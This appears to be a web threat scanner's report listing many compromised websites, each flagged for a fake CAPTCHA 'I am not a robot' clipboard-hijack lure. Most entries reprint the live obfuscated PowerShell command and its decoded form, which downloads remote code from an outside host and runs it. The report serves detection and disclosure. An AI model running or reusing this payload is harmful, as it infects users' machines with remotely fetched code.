"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://www.lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://www.lucprofessional.grupomoltz.com.br/",
"Timestamp": "2025-04-18 16:38:12",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://thesignaturemag.salviatech.com/",
"Timestamp": "2025-04-18 16:38:12",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://www.bratusferramentas.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://www.bratusferramentas.grupomoltz.com.br/",
"Timestamp": "2025-04-18 16:38:13",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://website.mypetapp.co.za/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://website.mypetapp.co.za/",
"Timestamp": "2025-04-18 16:38:14",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://ningbocrm.jintsume.net/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://ningbocrm.jintsume.net/",
"Timestamp": "2025-04-18 16:38:14",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://horno-rafelet.es/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://horno-rafelet.es/",
"Timestamp": "2025-04-18 16:38:15",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://mail.ningbocrm.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://mail.ningbocrm.com/",
"Timestamp": "2025-04-18 16:38:15",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://mail.laborpartyjo.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://mail.laborpartyjo.com/",
"Timestamp": "2025-04-18 16:38:16",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://www.kevinzhangadmin.jintsume.net/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://www.kevinzhangadmin.jintsume.net/",
"Timestamp": "2025-04-18 16:38:16",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://bmdcompany.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://bmdcompany.com/",
"Timestamp": "2025-04-18 16:38:17",
"Urls": "https://t.me/LearnUSDT_bot?start=540835569"
}
https://www.zamilgroups.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://www.zamilgroups.com/",
"Timestamp": "2025-04-18 16:38:17",
"Urls": "https://t.me/LearnUSDT_bot?start=540835569"
}
https://lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://lucprofessional.grupomoltz.com.br/",
"Timestamp": "2025-04-18 16:38:17",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://laborpartyjo.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://laborpartyjo.com/",
"Timestamp": "2025-04-18 16:38:18",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://www.thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://www.thesignaturemag.salviatech.com/",
"Timestamp": "2025-04-18 16:38:18",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
